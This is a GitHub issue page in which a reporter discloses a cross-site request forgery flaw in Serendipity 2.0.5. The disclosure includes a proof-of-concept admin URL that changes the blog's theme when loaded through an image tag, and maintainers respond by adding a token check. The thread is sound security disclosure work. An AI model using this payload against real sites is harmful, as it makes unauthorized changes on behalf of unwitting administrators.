Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello,
payload:http://127.0.0.1/serendipity/serendipity_admin.php?serendipity[adminModule]=templates&serendipity[adminAction]=install&serendipity[theme]=bartleby&serendipity[spartacus_fetch]=bartleby
Use tag <img> in another html to request this payload,after serendipity's admin visits it,theme will be changed.
<img>
version:2.0.5
The text was updated successfully, but these errors were encountered:
@onli I cannot currently take on this. We should be able to use the same CSRF check we enabled for plugins.
Sorry, something went wrong.
Okay, I assigned you by default since it is security related. I'll add a token check.
@We5ter Thanks for reporting!
cdf3756
I just pushed a fix for this. If you could test the fix as well, that would be greatly appreciated.
Thanks again for the report.
@onli thank you for fixing it.
onli
No branches or pull requests
Hello,
payload:http://127.0.0.1/serendipity/serendipity_admin.php?serendipity[adminModule]=templates&serendipity[adminAction]=install&serendipity[theme]=bartleby&serendipity[spartacus_fetch]=bartleby
Use tag
<img>in another html to request this payload,after serendipity's admin visits it,theme will be changed.version:2.0.5
The text was updated successfully, but these errors were encountered: